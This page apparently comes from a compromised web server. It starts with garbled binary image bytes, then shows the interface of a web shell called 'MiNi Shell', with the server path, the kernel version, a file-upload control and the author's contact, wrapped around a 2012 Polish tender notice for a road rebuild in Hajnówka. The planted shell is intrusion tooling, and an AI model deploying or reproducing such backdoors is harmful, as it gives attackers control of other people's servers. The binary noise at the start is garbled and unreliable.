JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120217/48384-N-2012.html

<p class="kh_header"><b>Hajnówka: Przebudowa  ulicy  Władysława  Jagiełły  i  11 Listopada w  Hajnówce</b><br>
<b>Numer ogłoszenia: 48384 - 2012; data zamieszczenia: 17.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Hajnówka , ul. Aleksego Zina 1, 17-200 Hajnówka, woj. podlaskie, tel. 085 6822180, 6822875, faks 085 6822994.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.hajnowka.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.hajnowka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa  ulicy  Władysława  Jagiełły  i  11 Listopada w  Hajnówce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest realizacja projektu pn: Przebudowa  ulicy  Władysława  Jagiełły  i  11 Listopada  w  Hajnówce polegająca  na:

1. Przebudowie  ul. Władysława  Jagiełły w Hajnówce  o  długości  208,00 m  i  szerokości  jezdni  
    6,0 m.   

    Przebudowa  będzie  polegać  na :    
    1. Przebudowie  istniejącego  chodnika  wraz  z  wjazdami: publicznymi  i  bramowymi.
    2. Wykonaniu  nawierzchni  jezdni  dla  ruchu  KR-1  z  mieszanek  mineralno-bitumicznych   
         (warstwa  wyrównawcza  i  ścieralna).
    
2. Przebudowie  ul. 11 Listopada  w  Hajnówce  o  łącznej  długości  665 m  i  szerokości  jezdni                       
    7,0 m.   

    Przebudowa  będzie  polegać  na :    
    1. Budowie  kanalizacji  deszczowej  O 315 PVC, O 300  i  O 200 GRP  .
    2. Wykonaniu  jezdni  dla  ruchu  KR3  (podbudowa, warstwa  wiążąca  i  ścieralna).
    3. Wykonaniu  dwustronnego  chodnika  wraz  z  wjazdami  bramowymi.  
    4. Wykonaniu  ścieżki  rowerowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.21.30-2, 45.23.32.22-1, 45.23.31.62-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferent  przystępujący  do  przetargu  zobowiązany  jest  wnieść  wadium  w  wysokości  
    75.000,00 zł  (słownie: siedemdziesiąt  pięć  tysięcy  złotych). 
2. Wadium  może  być  wnoszone  w  jednej  lub  kilku  następujących  formach:
    a.  pieniądzu,
    b.  poręczeniach  bankowych,
    c.  poręczeniach  spółdzielczej  kasy  oszczędnościowo - kredytowej, z  tym  że  poręczenie  kasy 
         jest  zawsze  poręczeniem  pieniężnym,
    d.  gwarancjach  bankowych,  
    e.  gwarancjach  ubezpieczeniowych,  
    f.  poręczeniach  udzielanych  przez  podmioty, o  których  mowa  w  art. 6b  ust. 5 pkt 2  ustawy    
         z  dnia  9 listopada  2000 roku  o  utworzeniu  Polskiej  Agencji  Rozwoju  Przedsiębiorczości
         (Dz. U.  z  2007 r. Nr  42, poz. 275  wraz  z  późniejszymi  zmianami).
3. Wadium  wnoszone  w  formie  pieniężnej  należy  wpłacić  przelewem  na  rachunek  bankowy
    Nr  52 1020 1332 0000 1302 0037 7218  w  PKO  BP  S.A.  Oddział  w  Hajnówce  z  dopiskiem 
    na  blankiecie  przelewu  Wadium - Przebudowa  ulicy  Władysława  Jagiełły  i  11 Listopada    
    w  Hajnówce. Dowód  wpłaty  lub  jego  kserokopię  poświadczoną  za  zgodność  z  oryginałem  
    należy  dołączyć  do  oferty. Nie  dopuszcza  się  wnoszenia  wadium  w  formie  pieniężnej       
    w  kasie  Zamawiającego.
4. Wadium  wnoszone w pozostałych  formach  należy  złożyć w formie  oryginału w sekretariacie  
    Zamawiającego  (pok. Nr 219). Do  oferty  należy  załączyć  kserokopię  potwierdzoną  za  
    zgodność  z  oryginałem.
5. Z  treści  gwarancji  (poręczenia)  musi  jednoznacznie  wynikać, jaki  jest  sposób  reprezentacji
    Gwaranta. Gwarancja  musi  być  podpisana  przez  upoważnionego  (upełnomocnionego) 
    przedstawiciela  Gwaranta. Podpis  powinien  być  sporządzony  w  sposób  umożliwiający  jego
    identyfikację  (złożony  wraz  z  imienną  pieczątką  lub  czytelny  z  podaniem  imienia                
    i  nazwiska). Z  treści  gwarancji  musi  wynikać  bezwarunkowe  zobowiązanie  Gwaranta  do  
    wypłaty  Zamawiającemu  pełnej  kwoty  wadium  w  okolicznościach  określonych  w  art. 46
    ust. 4a  i  5  ustawy, na  każde  pisemne  żądanie  zgłoszone  przez  Zamawiającego  w  terminie  
    związania  ofertą.
6. Wadium  musi  być  wniesione  najpóźniej  do  wyznaczonego  terminu  składania  ofert,            
    tj.  do  dnia  05 marca  2012 roku, godz. 1000.
7. W  przypadku  wadium  wnoszonego  w  pieniądzu  za  pomocą  przelewu  bankowego  decyduje  
    data  i  godzina  księgowania  na  rachunku  bankowym  Zamawiającego.
8. Wykonawca, który  nie  wniesie  wadium  lub  nie  zabezpieczy  oferty  akceptowalną  formą  
    wadium  zostanie  wykluczony  z  postępowania, a  jego  oferta  zostanie  odrzucona.
9. Zwrot  lub  zatrzymanie  wniesionego  wadium  nastąpi  w  oparciu  o  postanowienia  art. 46   
    ustawy  z  dnia  29 stycznia  2004 roku  prawo  zamówień  publicznych  (Dz. U. z  2010 roku         
    Nr 113, poz. 759 j.t.  wraz  z  późniejszymi  zmianami).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w  tym  zakresie  żadnych  wymagań, których  spełnienie 
                 Wykonawca  będzie  zobowiązany  wykazać.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  zostanie  spełniony, jeżeli  Wykonawca  wykaże, że  w  okresie  ostatnich  
                 pięciu  lat  przed  upływem  terminu  składania  ofert, a  jeżeli  okres  prowadzenia  
                 działalności  jest  krótszy - w tym  okresie, wykonał  co  najmniej  dwie  roboty   
                 budowlane  w  zakresie  budowy  lub  przebudowy  dróg  odpowiadające  swoim  
                 rodzajem  i  wartością  robotom  budowlanym  stanowiącym  przedmiot  zamówienia,     
                 z  podaniem  ich  rodzaju, wartości, daty  i  miejsca  wykonania  oraz  załączeniem  
                 dokumentów  potwierdzających, że  roboty  te  zostały  wykonane  zgodnie  z  zasadami  
                 sztuki  budowlanej  i  prawidłowo  ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie  precyzuje  w  tym  zakresie  żadnych  wymagań, których  spełnienie 
                 Wykonawca  będzie  zobowiązany  wykazać.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  celu  potwierdzenia  spełnienia  warunku  Wykonawca  winien  przedłożyć  wykaz  
                     osób, które  będą  uczestniczyć  w  wykonywaniu  zamówienia, posiadających  
                     uprawnienia  niezbędne  do  wykonania  przedmiotu  zamówienia, wymagane  
                     przepisami  ustawy  z  dnia  7 lipca  1994 roku  Prawo  budowlane  -  tj. uprawnienia                     
                     budowlane  wg  Rozporządzenia  Ministra  Transportu  i  Budownictwa  z  dnia         
                     28 kwietnia  2006 roku  w  sprawie  samodzielnych  funkcji  technicznych                  
                     w  budownictwie  (Dz. U. Nr 83, poz. 578  wraz  z  późniejszymi  zmianami)  do  
                     kierowania  robotami  budowlanymi:    



                                                       
                     -  Kierownik  Budowy   -  1 osoba : 
                                                      -  uprawnienia  budowlane  do  kierowania  robotami    
                                                          w  specjalności  drogowej  lub  odpowiadające  im 
                                                          uprawnienia  wydane  na  podstawie  wcześniej 
                                                          obowiązujących  przepisów,
                                                      -  doświadczenie  zawodowe - co  najmniej  3 lata  od 
                                                          uzyskania  uprawnień,                                         
                     -  Kierownik  Robót  w  branży  sanitarnej   -  1 osoba : 
                                                      -  uprawnienia  budowlane  do  kierowania  robotami    
                                                          w  specjalności  sanitarnej  lub  odpowiadające  im 
                                                          uprawnienia  wydane  na  podstawie  wcześniej 
                                                          obowiązujących  przepisów,
                                                      -  doświadczenie  zawodowe - co  najmniej  3 lata  od 
                                                          uzyskania  uprawnień,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a. Wykonawca  musi  wykazać  posiadanie  środków  finansowych  lub  zdolności 
                kredytowej  w  wysokości  nie  mniejszej  niż  wartość  oferty  (wg. kosztorysu  
                ofertowego  Wykonawcy).
b. Wykonawca  musi  być  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie 
    prowadzonej  działalności  związanej  z  przedmiotem  zamówienia  na  wartość  nie 
                mniejszą  niż  wartość  oferty  (wg. kosztorysu  ofertowego  Wykonawcy).
UWAGA : 
                 Wartości  podane  w  dokumentach  w  walutach  innych  niż  waluta  polska Wykonawca  przeliczy :
 - dla  posiadanych  środków  finansowych  zdolności  kredytowej  wg  średniego  kursu NBP  na  dzień  wystawienia  dokumentu, 
 - dla  ubezpieczenia  -  wg  średniego  kursu  NBP  na  7 dni  przed  terminem  składania 
    ofert .


2. Wykonawcy, którzy  nie  wykażą  spełnienia  warunków  udziału  w  postępowaniu  podlegać  
     będą  wykluczeniu  z  udziału  w  postępowaniu  na  podstawie  art. 24  ust. 1 i 2 ustawy. Ofertę  
     Wykonawcy  wykluczonego  uznaje  się  za  odrzuconą.
3. Ocena  spełniania  wyżej wymienione  warunków  dokonana  zostanie  zgodnie  z  formułą  spełnia - nie  
    spełnia w  oparciu  o  informacje  zawarte  w  dokumentach  i  oświadczeniach 
    wyszczególnionych  w  rozdziale  VI  niniejszej  specyfikacji. Z  treści  załączonych  
    dokumentów  musi  wynikać  jednoznacznie, iż  wyżej wymienione  warunki  Wykonawca  spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W  trakcie  realizacji  umowy  postanowienia  umowy  mogą  ulec  zmianom, jeżeli  zmiany   
     będą  korzystne  dla  Zamawiającego  lub  konieczność  wprowadzenia  zmian  wynikać  będzie   
     z  okoliczności, których  nie  można  było  przewidzieć  w  chwili  zawarcia  umowy  i  będą 
     dopuszczalne  w  granicach  unormowania  art. 144 ustawy  Prawo  zamówień  publicznych.
2. Zamawiający  przewiduje  możliwość  zmiany  postanowień  zawartej  umowy  w  przypadku:
     a. zmiany  regulacji  prawnych  obowiązujących  w  chwili  zawarcia  umowy,
     b. zmiany  danych  dotyczących  Zamawiającego  lub  Wykonawcy,
     c. zmiany  Podwykonawcy  robót,
     d. zmiany  przez  Wykonawcę  formy  wniesienia  zabezpieczenia  należytego  wykonania  
         umowy,
     e. zmiany  osób  kierujących  robotami  budowlanymi,
     f. konieczności  wprowadzenia  zmian  w  dokumentacji  projektowej, sposobie  lub  technologii 
        wykonania  przedmiotu  umowy,
     g. zmiany  terminu  i  zakresu  wykonania  zamówienia, które  zaistniały  w  trakcie  realizacji  
         przedmiotu  umowy  z  przyczyn  niezależnych  od  Zamawiającego  i  od  Wykonawcy  tj.:  
        -  wystąpienia  niekorzystnych  warunków  atmosferycznych, geologicznych  lub 
            hydrologicznych  uniemożliwiających  ze  względów  technologicznych  wykonanie 
            przedmiotu  umowy  w  ustalonym  terminie  lub  negatywnie  wpływających  na  jakość 
            wykonania  lub  trwałość  przedmiotu  umowy,
        -  wystąpienia  robót  dodatkowych, 
        -  przedłużającego  się  oczekiwania  na  uzgodnienia, decyzje  administracyjne, itp.,
        -  wystąpienia  odkryć  archeologicznych, 
        -  natrafienia  na  niewybuchy  i  niewypały, 
        -  wystąpienia  klęsk  żywiołowych (powódź, pożar itp.),  
     h. zmiana  zasad  finansowania  zamówienia,
     i. konieczności  dostosowania  treści  umowy  do  postanowień  umowy  zawartej  przez  
         Zamawiającego  z  instytucją  współfinansującą  realizację  zamówienia.
3. Warunki  ewentualnych  zmian  -  stosownie  do  czasu  trwania  okoliczności  będących  
     podstawą zmiany.
4. Zmiana  postanowień  zawartej  umowy  w  przypadkach  określonych  w  pkt. 2  nie  może  
    prowadzić  do  zwiększenia  wynagrodzenia  Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.hajnowka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Miasta  Hajnówka, 17 - 200 Hajnówka, ul. Aleksego  Zina  1,
tel. 85 682 6443, 682 2875
fax. 85 682 2994, 674 3746.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2012 godzina 10:00, miejsce: Urząd  Miasta  Hajnówka, 17 - 200 Hajnówka, ul. Aleksego  Zina  1,
                                                 pok. Nr  219  -  sekretariat  Urzędu..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Narodowy Program Przebudowy Dróg Lokalnych 2012 - 2015 - Etap II Bezpieczeństwo - Dostępność - Rozwój.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com